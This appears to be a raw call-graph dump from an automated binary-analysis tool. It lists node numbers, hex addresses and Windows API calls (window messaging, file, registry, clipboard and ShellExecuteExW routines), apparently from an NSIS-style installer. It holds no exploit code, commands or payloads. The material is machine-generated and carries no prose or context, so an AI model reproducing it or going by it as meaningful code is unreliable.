3936->3937 3938 402da6 17 API calls 3936->3938 3939 401cd3 3937->3939 3940 401c87 3937->3940 3938->3937 3942 402da6 17 API calls 3939->3942 3941 402d84 17 API calls 3940->3941 3944 401c8c 3941->3944 3943 401cd8 3942->3943 3945 402da6 17 API calls 3943->3945 3946 402d84 17 API calls 3944->3946 3947 401ce1 FindWindowExW 3945->3947 3948 401c98 3946->3948 3951 401d03 3947->3951 3949 401cc3 SendMessageW 3948->3949 3950 401ca5 SendMessageTimeoutW 3948->3950 3949->3951 3950->3951 3953 4066a5 17 API calls 3952->3953 3954 402d99 3953->3954 3954->3932 3962 4028c4 3963 4028ca 3962->3963 3964 4028d2 FindClose 3963->3964 3965 402c2a 3963->3965 3964->3965 3771 4040c5 3772 4040dd 3771->3772 3773 40423e 3771->3773 3772->3773 3774 4040e9 3772->3774 3775 40424f GetDlgItem GetDlgItem 3773->3775 3784 40428f 3773->3784 3776 4040f4 SetWindowPos 3774->3776 3777 404107 3774->3777 3847 4045c4 3775->3847 3776->3777 3781 404110 ShowWindow 3777->3781 3782 404152 3777->3782 3779 4042e9 3780 404610 SendMessageW 3779->3780 3794 404239 3779->3794 3817 4042fb 3780->3817 3786 404130 GetWindowLongW 3781->3786 3787 40422b 3781->3787 3788 404171 3782->3788 3789 40415a DestroyWindow 3782->3789 3783 404279 KiUserCallbackDispatcher 3790 40140b 2 API calls 3783->3790 3784->3779 3785 401389 2 API calls 3784->3785 3791 4042c1 3785->3791 3786->3787 3793 404149 ShowWindow 3786->3793 3853 40462b 3787->3853 3796 404176 SetWindowLongW 3788->3796 3797 404187 3788->3797 3795 40456e 3789->3795 3790->3784 3791->3779 3798 4042c5 SendMessageW 3791->3798 3793->3782 3795->3794 3804 40457e ShowWindow 3795->3804 3796->3794 3797->3787 3801 404193 GetDlgItem 3797->3801 3798->3794 3799 40140b 2 API calls 3799->3817 3800 40454f DestroyWindow EndDialog 3800->3795 3802 4041c1 3801->3802 3803 4041a4 SendMessageW IsWindowEnabled 3801->3803 3806 4041ce 3802->3806 3807 404215 SendMessageW 3802->3807 3808 4041e1 3802->3808 3818 4041c6 3802->3818 3803->3794 3803->3802 3804->3794 3805 4066a5 17 API calls 3805->3817 3806->3807 3806->3818 3807->3787 3811 4041e9 3808->3811 3812 4041fe 3808->3812 3810 4045c4 18 API calls 3810->3817 3815 40140b 2 API calls 3811->3815 3814 40140b 2 API calls 3812->3814 3813 4041fc 3813->3787 3816 404205 3814->3816 3815->3818 3816->3787 3816->3818 3817->3799 3817->3800 3817->3805 3817->3810 3819 4045c4 18 API calls 3817->3819 3850 40459d 3818->3850 3820 404376 GetDlgItem 3819->3820 3821 404393 ShowWindow EnableWindow 3820->3821 3822 40438b 3820->3822 3867 4045e6 EnableWindow 3821->3867 3822->3821 3824 4043bd EnableWindow 3829 4043d1 3824->3829 3825 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3826 404406 SendMessageW 3825->3826 3825->3829 3826->3829 3828 4040a6 18 API calls 3828->3829 3829->3825 3829->3828 3868 4045f9 SendMessageW 3829->3868 3869 406668 lstrcpynW 3829->3869 3831 404435 lstrlenW 3832 4066a5 17 API calls 3831->3832 3833 40444b SetWindowTextW 3832->3833 3834 401389 2 API calls 3833->3834 3835 40445c 3834->3835 3835->3794 3835->3817 3836 40448f DestroyWindow 3835->3836 3838 40448a 3835->3838 3836->3795 3837 4044a9 CreateDialogParamW 3836->3837 3837->3795 3839 4044dc 3837->3839 3838->3794 3840 4045c4 18 API calls 3839->3840 3841 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3840->3841 3842 401389 2 API calls 3841->3842 3843 40452d 3842->3843 3843->3794 3844 404535 ShowWindow 3843->3844 3845 404610 SendMessageW 3844->3845 3846 40454d 3845->3846 3846->3795 3848 4066a5 17 API calls 3847->3848 3849 4045cf SetDlgItemTextW 3848->3849 3849->3783 3851 4045a4 3850->3851 3852 4045aa SendMessageW 3850->3852 3851->3852 3852->3813 3854 4046ee 3853->3854 3855 404643 GetWindowLongW 3853->3855 3854->3794 3855->3854 3856 404658 3855->3856 3856->3854 3857 404685 GetSysColor 3856->3857 3858 404688 3856->3858 3857->3858 3859 404698 SetBkMode 3858->3859 3860 40468e SetTextColor 3858->3860 3861 4046b0 GetSysColor 3859->3861 3862 4046b6 3859->3862 3860->3859 3861->3862 3863 4046bd SetBkColor 3862->3863 3864 4046c7 3862->3864 3863->3864 3864->3854 3865 4046e1 CreateBrushIndirect 3864->3865 3866 4046da DeleteObject 3864->3866 3865->3854 3866->3865 3867->3824 3868->3829 3869->3831 3969 4016cc 3970 402da6 17 API calls 3969->3970 3971 4016d2 GetFullPathNameW 3970->3971 3972 4016ec 3971->3972 3978 40170e 3971->3978 3975 40699e 2 API calls 3972->3975 3972->3978 3973 401723 GetShortPathNameW 3974 402c2a 3973->3974 3976 4016fe 3975->3976 3976->3978 3979 406668 lstrcpynW 3976->3979 3978->3973 3978->3974 3979->3978 3980 401e4e GetDC 3981 402d84 17 API calls 3980->3981 3982 401e60 GetDeviceCaps MulDiv ReleaseDC 3981->3982 3983 402d84 17 API calls 3982->3983 3984 401e91 3983->3984 3985 4066a5 17 API calls 3984->3985 3986 401ece CreateFontIndirectW 3985->3986 3987 402638 3986->3987 3987->3987 3988 402950 3989 402da6 17 API calls 3988->3989 3991 40295c 3989->3991 3990 402972 3993 406133 2 API calls 3990->3993 3991->3990 3992 402da6 17 API calls 3991->3992 3992->3990 3994 402978 3993->3994 4016 406158 GetFileAttributesW CreateFileW 3994->4016 3996 402985 3997 402a3b 3996->3997 3998 4029a0 GlobalAlloc 3996->3998 3999 402a23 3996->3999 4000 402a42 DeleteFileW 3997->4000 4001 402a55 3997->4001 3998->3999 4002 4029b9 3998->4002 4003 403371 44 API calls 3999->4003 4000->4001 4017 4035f8 SetFilePointer 4002->4017 4005 402a30 CloseHandle 4003->4005 4005->3997 4006 4029bf 4007 4035e2 ReadFile 4006->4007 4008 4029c8 GlobalAlloc 4007->4008 4009 4029d8 4008->4009 4010 402a0c 4008->4010 4011 403371 44 API calls 4009->4011 4012 40620a WriteFile 4010->4012 4015 4029e5 4011->4015 4013 402a18 GlobalFree 4012->4013 4013->3999 4014 402a03 GlobalFree 4014->4010 4015->4014 4016->3996 4017->4006 4025 403cd5 4026 403ce0 4025->4026 4027 403ce4 4026->4027 4028 403ce7 GlobalAlloc 4026->4028 4028->4027 4029 401956 4030 402da6 17 API calls 4029->4030 4031 40195d lstrlenW 4030->4031 4032 402638 4031->4032 4033 4014d7 4034 402d84 17 API calls 4033->4034 4035 4014dd Sleep 4034->4035 4037 402c2a 4035->4037 4038 4020d8 4039 4020ea 4038->4039 4049 40219c 4038->4049 4040 402da6 17 API calls 4039->4040 4041 4020f1 4040->4041 4043 402da6 17 API calls 4041->4043 4042 401423 24 API calls 4044 4022f6 4042->4044 4045 4020fa 4043->4045 4046 402110 LoadLibraryExW 4045->4046 4047 402102 GetModuleHandleW 4045->4047 4048 402121 4046->4048 4046->4049 4047->4046 4047->4048 4058 406aa4 4048->4058 4049->4042 4052 402132 4055 401423 24 API calls 4052->4055 4056 402142 4052->4056 4053 40216b 4054 4056ca 24 API calls 4053->4054 4054->4056 4055->4056 4056->4044 4057 40218e FreeLibrary 4056->4057 4057->4044 4063 40668a WideCharToMultiByte 4058->4063 4060 406ac1 4061 406ac8 GetProcAddress 4060->4061 4062 40212c 4060->4062 4061->4062 4062->4052 4062->4053 4063->4060 4064 402b59 4065 402b60 4064->4065 4066 402bab 4064->4066 4068 402ba9 4065->4068 4070 402d84 17 API calls 4065->4070 4067 406a35 5 API calls 4066->4067 4069 402bb2 4067->4069 4071 402da6 17 API calls 4069->4071 4072 402b6e 4070->4072 4073 402bbb 4071->4073 4074 402d84 17 API calls 4072->4074 4073->4068 4075 402bbf IIDFromString 4073->4075 4077 402b7a 4074->4077 4075->4068 4076 402bce 4075->4076 4076->4068 4082 406668 lstrcpynW 4076->4082 4081 4065af wsprintfW 4077->4081 4080 402beb CoTaskMemFree 4080->4068 4081->4068 4082->4080 4083 402a5b 4084 402d84 17 API calls 4083->4084 4085 402a61 4084->4085 4086 402aa4 4085->4086 4087 402a88 4085->4087 4092 40292e 4085->4092 4089 402abe 4086->4089 4090 402aae 4086->4090 4088 402a8d 4087->4088 4096 402a9e 4087->4096 4097 406668 lstrcpynW 4088->4097 4091 4066a5 17 API calls 4089->4091 4093 402d84 17 API calls 4090->4093 4091->4096 4093->4096 4096->4092 4098 4065af wsprintfW 4096->4098 4097->4092 4098->4092 3883 40175c 3884 402da6 17 API calls 3883->3884 3885 401763 3884->3885 3886 406187 2 API calls 3885->3886 3887 40176a 3886->3887 3888 406187 2 API calls 3887->3888 3888->3887 4099 401d5d 4100 402d84 17 API calls 4099->4100 4101 401d6e SetWindowLongW 4100->4101 4102 402c2a 4101->4102 4103 4028de 4104 4028e6 4103->4104 4105 4028ea FindNextFileW 4104->4105 4106 4028fc 4104->4106 4105->4106 4107 402943 4105->4107 4109 406668 lstrcpynW 4107->4109 4109->4106 4110 406d5f 4116 406be3 4110->4116 4111 40754e 4112 406c64 GlobalFree 4113 406c6d GlobalAlloc 4112->4113 4113->4111 4113->4116 4114 406ce4 GlobalAlloc 4114->4111 4114->4116 4115 406cdb GlobalFree 4115->4114 4116->4111 4116->4112 4116->4113 4116->4114 4116->4115 4117 401563 4118 402ba4 4117->4118 4121 4065af wsprintfW 4118->4121 4120 402ba9 4121->4120 4122 401968 4123 402d84 17 API calls 4122->4123 4124 40196f 4123->4124 4125 402d84 17 API calls 4124->4125 4126 40197c 4125->4126 4127 402da6 17 API calls 4126->4127 4128 401993 lstrlenW 4127->4128 4130 4019a4 4128->4130 4129 4019e5 4130->4129 4134 406668 lstrcpynW 4130->4134 4132 4019d5 4132->4129 4133 4019da lstrlenW 4132->4133 4133->4129 4134->4132 4142 40166a 4143 402da6 17 API calls 4142->4143 4144 401670 4143->4144 4145 40699e 2 API calls 4144->4145 4146 401676 4145->4146 4147 402aeb 4148 402d84 17 API calls 4147->4148 4149 402af1 4148->4149 4150 4066a5 17 API calls 4149->4150 4151 40292e 4149->4151 4150->4151 4152 4026ec 4153 402d84 17 API calls 4152->4153 4154 4026fb 4153->4154 4155 402745 ReadFile 4154->4155 4156 4061db ReadFile 4154->4156 4157 402785 MultiByteToWideChar 4154->4157 4158 40283a 4154->4158 4161 4027ab SetFilePointer MultiByteToWideChar 4154->4161 4162 40284b 4154->4162 4164 402838 4154->4164 4165 406239 SetFilePointer 4154->4165 4155->4154 4155->4164 4156->4154 4157->4154 4174 4065af wsprintfW 4158->4174 4161->4154 4163 40286c SetFilePointer 4162->4163 4162->4164 4163->4164 4166 406255 4165->4166 4173 40626d 4165->4173 4167 4061db ReadFile 4166->4167 4168 406261 4167->4168 4169 406276 SetFilePointer 4168->4169 4170 40629e SetFilePointer 4168->4170 4168->4173 4169->4170 4171 406281 4169->4171 4170->4173 4172 40620a WriteFile 4171->4172 4172->4173 4173->4154 4174->4164 4175 404a6e 4176 404aa4 4175->4176 4177 404a7e 4175->4177 4179 40462b 8 API calls 4176->4179 4178 4045c4 18 API calls 4177->4178 4180 404a8b SetDlgItemTextW 4178->4180 4181 404ab0 4179->4181 4180->4176 3889 40176f 3890 402da6 17 API calls 3889->3890 3891 401776 3890->3891 3892 401796 3891->3892 3893 40179e 3891->3893 3928 406668 lstrcpynW 3892->3928 3929 406668 lstrcpynW 3893->3929 3896 40179c 3900 4068ef 5 API calls 3896->3900 3897 4017a9 3898 405f37 3 API calls 3897->3898 3899 4017af lstrcatW 3898->3899 3899->3896 3920 4017bb 3900->3920 3901 40699e 2 API calls 3901->3920 3902 406133 2 API calls 3902->3920 3904 4017cd CompareFileTime 3904->3920 3905 40188d 3907 4056ca 24 API calls 3905->3907 3906 401864 3908 4056ca 24 API calls 3906->3908 3916 401879 3906->3916 3909 401897 3907->3909 3908->3916 3910 403371 44 API calls 3909->3910 3911 4018aa 3910->3911 3912 4018be SetFileTime 3911->3912 3913 4018d0 FindCloseChangeNotification 3911->3913 3912->3913 3915 4018e1 3913->3915 3913->3916 3914 4066a5 17 API calls 3914->3920 3918 4018e6 3915->3918 3919 4018f9 3915->3919 3917 406668 lstrcpynW 3917->3920 3921 4066a5 17 API calls 3918->3921 3922 4066a5 17 API calls 3919->3922 3920->3901 3920->3902 3920->3904 3920->3905 3920->3906 3920->3914 3920->3917 3923 405cc8 MessageBoxIndirectW 3920->3923 3927 406158 GetFileAttributesW CreateFileW 3920->3927 3924 4018ee lstrcatW 3921->3924 3925 401901 3922->3925 3923->3920 3924->3925 3926 405cc8 MessageBoxIndirectW 3925->3926 3926->3916 3927->3920 3928->3896 3929->3897 4182 401a72 4183 402d84 17 API calls 4182->4183 4184 401a7b 4183->4184 4185 402d84 17 API calls 4184->4185 4186 401a20 4185->4186 4187 401573 4188 401583 ShowWindow 4187->4188 4189 40158c 4187->4189 4188->4189 4190 402c2a 4189->4190 4191 40159a ShowWindow 4189->4191 4191->4190 4192 4023f4 4193 402da6 17 API calls 4192->4193 4194 402403 4193->4194 4195 402da6 17 API calls 4194->4195 4196 40240c 4195->4196 4197 402da6 17 API calls 4196->4197 4198 402416 GetPrivateProfileStringW 4197->4198 4199 4014f5 SetForegroundWindow 4200 402c2a 4199->4200 4201 401ff6 4202 402da6 17 API calls 4201->4202 4203 401ffd 4202->4203 4204 40699e 2 API calls 4203->4204 4205 402003 4204->4205 4206 402014 4205->4206 4208 4065af wsprintfW 4205->4208 4208->4206 4209 401b77 4210 402da6 17 API calls 4209->4210 4211 401b7e 4210->4211 4212 402d84 17 API calls 4211->4212 4213 401b87 wsprintfW 4212->4213 4214 402c2a 4213->4214 4215 4046fa lstrcpynW lstrlenW 4216 40167b 4217 402da6 17 API calls 4216->4217 4218 401682 4217->4218 4219 402da6 17 API calls 4218->4219 4220 40168b 4219->4220 4221 402da6 17 API calls 4220->4221 4222 401694 MoveFileW 4221->4222 4223 4016a0 4222->4223 4224 4016a7 4222->4224 4226 401423 24 API calls 4223->4226 4225 40699e 2 API calls 4224->4225 4228 4022f6 4224->4228 4227 4016b6 4225->4227 4226->4228 4227->4228 4229 406428 36 API calls 4227->4229 4229->4223 4237 4019ff 4238 402da6 17 API calls 4237->4238 4239 401a06 4238->4239 4240 402da6 17 API calls 4239->4240 4241 401a0f 4240->4241 4242 401a16 lstrcmpiW 4241->4242 4243 401a28 lstrcmpW 4241->4243 4244 401a1c 4242->4244 4243->4244 4245 4022ff 4246 402da6 17 API calls 4245->4246 4247 402305 4246->4247 4248 402da6 17 API calls 4247->4248 4249 40230e 4248->4249 4250 402da6 17 API calls 4249->4250 4251 402317 4250->4251 4252 40699e 2 API calls 4251->4252 4253 402320 4252->4253 4254 402331 lstrlenW lstrlenW 4253->4254 4258 402324 4253->4258 4256 4056ca 24 API calls 4254->4256 4255 4056ca 24 API calls 4259 40232c 4255->4259 4257 40236f SHFileOperationW 4256->4257 4257->4258 4257->4259 4258->4255 4258->4259 4260 401000 4261 401037 BeginPaint GetClientRect 4260->4261 4262 40100c DefWindowProcW 4260->4262 4264 4010f3 4261->4264 4265 401179 4262->4265 4266 401073 CreateBrushIndirect FillRect DeleteObject 4264->4266 4267 4010fc 4264->4267 4266->4264 4268 401102 CreateFontIndirectW 4267->4268 4269 401167 EndPaint 4267->4269 4268->4269 4270 401112 6 API calls 4268->4270 4269->4265 4270->4269 4271 401d81 4272 401d94 GetDlgItem 4271->4272 4273 401d87 4271->4273 4275 401d8e 4272->4275 4274 402d84 17 API calls 4273->4274 4274->4275 4276 402da6 17 API calls 4275->4276 4278 401dd5 GetClientRect LoadImageW SendMessageW 4275->4278 4276->4278 4279 401e33 4278->4279 4281 401e3f 4278->4281 4280 401e38 DeleteObject 4279->4280 4279->4281 4280->4281 4282 401503 4283 40150b 4282->4283 4285 40151e 4282->4285 4284 402d84 17 API calls 4283->4284 4284->4285 4286 404783 4287 40479b 4286->4287 4291 4048b5 4286->4291 4292 4045c4 18 API calls 4287->4292 4288 40491f 4289 4049e9 4288->4289 4290 404929 GetDlgItem 4288->4290 4297 40462b 8 API calls 4289->4297 4293 404943 4290->4293 4294 4049aa 4290->4294 4291->4288 4291->4289 4295 4048f0 GetDlgItem SendMessageW 4291->4295 4296 404802 4292->4296 4293->4294 4300 404969 SendMessageW LoadCursorW SetCursor 4293->4300 4294->4289 4301 4049bc 4294->4301 4319 4045e6 EnableWindow 4295->4319 4299 4045c4 18 API calls 4296->4299 4307 4049e4 4297->4307 4303 40480f CheckDlgButton 4299->4303 4323 404a32 4300->4323 4305 4049d2 4301->4305 4306 4049c2 SendMessageW 4301->4306 4302 40491a 4320 404a0e 4302->4320 4317 4045e6 EnableWindow 4303->4317 4305->4307 4308 4049d8 SendMessageW 4305->4308 4306->4305 4308->4307 4312 40482d GetDlgItem 4318 4045f9 SendMessageW 4312->4318 4314 404843 SendMessageW 4315 404860 GetSysColor 4314->4315 4316 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4314->4316 4315->4316 4316->4307 4317->4312 4318->4314 4319->4302 4321 404a21 SendMessageW 4320->4321 4322 404a1c 4320->4322 4321->4288 4322->4321 4326 405c8e ShellExecuteExW 4323->4326 4325 404998 LoadCursorW SetCursor 4325->4294 4326->4325 4327 402383 4328 40238a 4327->4328 4331 40239d 4327->4331 4329 4066a5 17 API calls 4328->4329 4330 402397 4329->4330 4332 405cc8 MessageBoxIndirectW 4330->4332 4332->4331 4333 402c05 SendMessageW 4334 402c2a 4333->4334 4335 402c1f InvalidateRect 4333->4335 4335->4334 4336 405809 4337 4059b3 4336->4337 4338 40582a GetDlgItem GetDlgItem GetDlgItem 4336->4338 4340 4059bc GetDlgItem CreateThread CloseHandle 4337->4340 4342 4059e4 4337->4342 4381 4045f9 SendMessageW 4338->4381 4340->4342 4341 40589a 4351 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4341->4351 4343 405a0f 4342->4343 4344 405a34 4342->4344 4345 4059fb ShowWindow ShowWindow 4342->4345 4346 405a6f 4343->4346 4348 405a23 4343->4348 4349 405a49 ShowWindow 4343->4349 4350 40462b 8 API calls 4344->4350 4383 4045f9 SendMessageW 4345->4383 4346->4344 4352 405a7d SendMessageW 4346->4352 4353 40459d SendMessageW 4348->4353 4355 405a69 4349->4355 4356 405a5b 4349->4356 4354 405a42 4350->4354 4357 4058f3 SendMessageW SendMessageW 4351->4357 4358 40590f 4351->4358 4352->4354 4359 405a96 CreatePopupMenu 4352->4359 4353->4344 4363 40459d SendMessageW 4355->4363 4362 4056ca 24 API calls 4356->4362 4357->4358 4360 405922 4358->4360 4361 405914 SendMessageW 4358->4361 4364 4066a5 17 API calls 4359->4364 4365 4045c4 18 API calls 4360->4365 4361->4360 4362->4355 4363->4346 4366 405aa6 AppendMenuW 4364->4366 4367 405932 4365->4367 4368 405ac3 GetWindowRect 4366->4368 4369 405ad6 TrackPopupMenu 4366->4369 4370 40593b ShowWindow 4367->4370 4371 40596f GetDlgItem SendMessageW 4367->4371 4368->4369 4369->4354 4372 405af1 4369->4372 4373 405951 ShowWindow 4370->4373 4374 40595e 4370->4374 4371->4354 4375 405996 SendMessageW SendMessageW 4371->4375 4376 405b0d SendMessageW 4372->4376 4373->4374 4382 4045f9 SendMessageW 4374->4382 4375->4354 4376->4376 4377 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4376->4377 4379 405b4f SendMessageW 4377->4379 4379->4379 4380 405b78 GlobalUnlock SetClipboardData CloseClipboard 4379->4380 4380->4354 4381->4341 4382->4371 4383->4343 4384 40248a 4385 402da6 17 API calls 4384->4385 4386 40249c 4385->4386 4387 402da6 17 API calls 4386->4387 4388 4024a6 4387->4388 4389 4024de 4388->4389 4390 40292e 4388->4390 4391 402da6 17 API calls 4388->4391 4392 4024ea 4389->4392 4394 402d84 17 API calls 4389->4394 4393 4024d4 lstrlenW 4391->4393 4395 402509 RegSetValueExW 4392->4395 4396 403371 44 API calls 4392->4396 4393->4389 4394->4392 4397 40251f RegCloseKey 4395->4397 4396->4395 4397->4390 4399 404e0b 4400 404e37 4399->4400 4401 404e1b 4399->4401 4403 404e6a 4400->4403 4404 404e3d SHGetPathFromIDListW 4400->4404 4410 405cac GetDlgItemTextW 4401->4410 4406 404e4d 4404->4406 4409 404e54 SendMessageW 4404->4409 4405 404e28 SendMessageW 4405->4400 4407 40140b 2 API calls 4406->4407 4407->4409 4409->4403 4410->4405 4411 40290b 4412 402da6 17 API calls 4411->4412 4413 402912 FindFirstFileW 4412->4413 4414 402925 4413->4414 4415 40293a 4413->4415 4419 4065af wsprintfW 4415->4419 4417 402943 4420 406668 lstrcpynW 4417->4420 4419->4417 4420->4414 4421 40190c 4422 401943 4421->4422 4423 402da6 17 API calls 4422->4423 4424 401948 4423->4424 4425 405d74 67 API calls 4424->4425 4426 401951 4425->4426 4427 40190f 4428 402da6 17 API calls 4427->4428 4429 401916 4428->4429 4430 405cc8 MessageBoxIndirectW 4429->4430 4431 40191f 4430->4431 4432 401491 4433 4056ca 24 API calls 4432->4433 4434 401498 4433->4434 4435 402891 4436 402898 4435->4436 4442 402ba9 4435->4442 4437 402d84 17 API calls 4436->4437 4438 40289f 4437->4438 4439 4028ae SetFilePointer 4438->4439 4440 4028be 4439->4440 4439->4442 4443 4065af wsprintfW 4440->4443 4443->4442 4444 401f12 4445 402da6 17 API calls 4444->4445 4446 401f18 4445->4446 4447 402da6 17 API calls 4446->4447 4448 401f21 4447->4448 4449 402da6 17 API calls 4448->4449 4450 401f2a 4449->4450 4451 402da6 17 API calls 4450->4451 4452 401f33 4451->4452 4453 401423 24 API calls 4452->4453 4454 401f3a 4453->4454 4461 405c8e ShellExecuteExW 4454->4461 4456 401f82 4457 406ae0 5 API calls 4456->4457 4458 40292e 4456->4458 4459 401f9f CloseHandle 4457->4459 4459->4458 4461->4456 4462 402f93 4463 402fa5 SetTimer 4462->4463 4464 402fbe 4462->4464 4463->4464 4465 40300c 4464->4465 4466 403012 MulDiv 4464->4466 4467 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4466->4467 4467->4465 4483 401d17 4484 402d84 17 API calls 4483->4484 4485 401d1d IsWindow 4484->4485 4486 401a20 4485->4486 4487 401b9b 4488 401ba8 4487->4488 4489 401bec 4487->4489 4492 401c31 4488->4492 4496 401bbf 4488->4496 4490 401bf1 4489->4490 4491 401c16 GlobalAlloc 4489->4491 4497 40239d 4490->4497 4508 406668 lstrcpynW 4490->4508 4493 4066a5 17 API calls 4491->4493 4494 4066a5 17 API calls 4492->4494 4492->4497 4493->4492 4499 402397 4494->4499 4506 406668 lstrcpynW 4496->4506 4498 401c03 GlobalFree 4498->4497 4502 405cc8 MessageBoxIndirectW 4499->4502 4501 401bce 4507 406668 lstrcpynW 4501->4507 4502->4497 4504 401bdd 4509 406668 lstrcpynW 4504->4509 4506->4501 4507->4504 4508->4498 4509->4497 4510 40261c 4511 402da6 17 API calls 4510->4511 4512 402623 4511->4512 4515 406158 GetFileAttributesW CreateFileW 4512->4515 4514 40262f 4515->4514 4523 40149e 4524 4014ac PostQuitMessage 4523->4524 4525 40239d 4523->4525 4524->4525 4526 40259e 4536 402de6 4526->4536 4529 402d84 17 API calls 4530 4025b1 4529->4530 4531 4025d9 RegEnumValueW 4530->4531 4532 4025cd RegEnumKeyW 4530->4532 4533 40292e 4530->4533 4534 4025ee RegCloseKey 4531->4534 4532->4534 4534->4533 4537 402da6 17 API calls 4536->4537 4538 402dfd 4537->4538 4539 4064d5 RegOpenKeyExW 4538->4539 4540 4025a8 4539->4540 4540->4529 4541 4015a3 4542 402da6 17 API calls 4541->4542 4543 4015aa SetFileAttributesW 4542->4543 4544 4015bc 4543->4544 3750 401fa4 3751 402da6 17 API calls 3750->3751 3752 401faa 3751->3752 3753 4056ca 24 API calls 3752->3753 3754 401fb4 3753->3754 3755 405c4b 2 API calls 3754->3755 3756 401fba 3755->3756 3757 401fdd CloseHandle 3756->3757 3760 40292e 3756->3760 3765 406ae0 WaitForSingleObject 3756->3765 3757->3760 3761 401fcf 3762 401fd4 3761->3762 3763 401fdf 3761->3763 3770 4065af wsprintfW 3762->3770 3763->3757 3766 406afa 3765->3766 3767 406b0c GetExitCodeProcess 3766->3767 3768 406a71 2 API calls 3766->3768 3767->3761 3769 406b01 WaitForSingleObject 3768->3769 3769->3766 3770->3757 3870 403c25 3871 403c40 3870->3871 3872 403c36 CloseHandle 3870->3872 3873 403c54 3871->3873 3874 403c4a CloseHandle 3871->3874 3872->3871 3879 403c82 3873->3879 3874->3873 3877 405d74 67 API calls 3878 403c65 3877->3878 3880 403c90 3879->3880 3881 403c59 3880->3881 3882 403c95 FreeLibrary GlobalFree 3880->3882 3881->3877 3882->3881 3882->3882 4545 40202a 4546 402da6 17 API calls 4545->4546 4547 402031 4546->4547 4548 406a35 5 API calls 4547->4548 4549 402040 4548->4549 4550 4020cc 4549->4550 4551 40205c GlobalAlloc 4549->4551 4551->4550 4552 402070 4551->4552 4553 406a35 5 API calls 4552->4553 4554 402077 4553->4554 4555 406a35 5 API calls 4554->4555 4556 402081 4555->4556 4556->4550 4560 4065af wsprintfW 4556->4560 4558 4020ba 4561 4065af wsprintfW 4558->4561 4560->4558 4561->4550 4562 40252a 4563 402de6 17 API calls 4562->4563 4564 402534 4563->4564 4565 402da6 17 API calls 4564->4565 4566 40253d 4565->4566 4567 402548 RegQueryValueExW 4566->4567 4572 40292e 4566->4572 4568 40256e RegCloseKey 4567->4568 4569 402568 4567->4569 4568->4572 4569->4568 4573 4065af wsprintfW 4569->4573 4573->4568 4574 4021aa 4575 402da6 17 API calls 4574->4575 4576 4021b1 4575->4576 4577 402da6 17 API calls 4576->4577 4578 4021bb 4577->4578 4579 402da6 17 API calls 4578->4579 4580 4021c5 4579->4580 4581 402da6 17 API calls 4580->4581 4582 4021cf 4581->4582 4583 402da6 17 API calls 4582->4583 4584 4021d9 4583->4584 4585 402218 CoCreateInstance 4584->4585 4586 402da6 17 API calls 4584->4586 4589 402237 4585->4589 4586->4585 4587 401423 24 API calls 4588 4022f6 4587->4588 4589->4587 4589->4588 4597 401a30 4598 402da6 17 API calls 4597->4598 4599 401a39 ExpandEnvironmentStringsW 4598->4599 4600 401a4d 4599->4600 4602 401a60 4599->4602 4601 401a52 lstrcmpW 4600->4601 4600->4602 4601->4602 4603 405031 GetDlgItem GetDlgItem 4604 405083 7 API calls 4603->4604 4608 4052a8 4603->4608 4605 40512a DeleteObject 4604->4605 4606 40511d SendMessageW 4604->4606 4607 405133 4605->4607 4606->4605 4609 40516a 4607->4609 4611 4066a5 17 API calls 4607->4611 4625 40538a 4608->4625 4635 405317 4608->4635 4657 404f7f SendMessageW 4608->4657 4612 4045c4 18 API calls 4609->4612 4610 405436 4614 405440 SendMessageW 4610->4614 4615 405448 4610->4615 4616 40514c SendMessageW SendMessageW 4611->4616 4617 40517e 4612->4617 4613 40529b 4621 40462b 8 API calls 4613->4621 4614->4615 4627 405461 4615->4627 4628 40545a ImageList_Destroy 4615->4628 4632 405471 4615->4632 4616->4607 4618 4045c4 18 API calls 4617->4618 4636 40518f 4618->4636 4619 4053e3 SendMessageW 4619->4613 4624 4053f8 SendMessageW 4619->4624 4620 40537c SendMessageW 4620->4625 4626 405637 4621->4626 4623 4055eb 4623->4613 4633 4055fd ShowWindow GetDlgItem ShowWindow 4623->4633 4630 40540b 4624->4630 4625->4610 4625->4613 4625->4619 4631 40546a GlobalFree 4627->4631 4627->4632 4628->4627 4629 40526a GetWindowLongW SetWindowLongW 4634 405283 4629->4634 4641 40541c SendMessageW 4630->4641 4631->4632 4632->4623 4650 4054ac 4632->4650 4662 404fff 4632->4662 4633->4613 4637 4052a0 4634->4637 4638 405288 ShowWindow 4634->4638 4635->4620 4635->4625 4636->4629 4640 4051e2 SendMessageW 4636->4640 4642 405265 4636->4642 4644 405220 SendMessageW 4636->4644 4645 405234 SendMessageW 4636->4645 4656 4045f9 SendMessageW 4637->4656 4655 4045f9 SendMessageW 4638->4655 4640->4636 4641->4610 4642->4629 4642->4634 4644->4636 4645->4636 4647 4055b6 4648 4055c1 InvalidateRect 4647->4648 4651 4055cd 4647->4651 4648->4651 4649 4054da SendMessageW 4654 4054f0 4649->4654 4650->4649 4650->4654 4651->4623 4671 404f3a 4651->4671 4653 405564 SendMessageW SendMessageW 4653->4654 4654->4647 4654->4653 4655->4613 4656->4608 4658 404fa2 GetMessagePos ScreenToClient SendMessageW 4657->4658 4659 404fde SendMessageW 4657->4659 4660 404fd6 4658->4660 4661 404fdb 4658->4661 4659->4660 4660->4635 4661->4659 4674 406668 lstrcpynW 4662->4674 4664 405012 4675 4065af wsprintfW 4664->4675 4666 40501c 4667 40140b 2 API calls 4666->4667 4668 405025 4667->4668 4676 406668 lstrcpynW 4668->4676 4670 40502c 4670->4650 4677 404e71 4671->4677 4673 404f4f 4673->4623 4674->4664 4675->4666 4676->4670 4678 404e8a 4677->4678 4679 4066a5 17 API calls 4678->4679 4680 404eee 4679->4680 4681 4066a5 17 API calls 4680->4681 4682 404ef9 4681->4682 4683 4066a5 17 API calls 4682->4683 4684 404f0f lstrlenW wsprintfW SetDlgItemTextW 4683->4684 4684->4673 4690 4023b2 4691 4023c0 4690->4691 4692 4023ba 4690->4692 4694 402da6 17 API calls 4691->4694 4695 4023ce 4691->4695 4693 402da6 17 API calls 4692->4693 4693->4691 4694->4695 4696 4023dc 4695->4696 4697 402da6 17 API calls 4695->4697 4698 402da6 17 API calls 4696->4698 4697->4696 4699 4023e5 WritePrivateProfileStringW 4698->4699 4700 404734 lstrlenW 4701 404753 4700->4701 4702 404755 WideCharToMultiByte 4700->4702 4701->4702 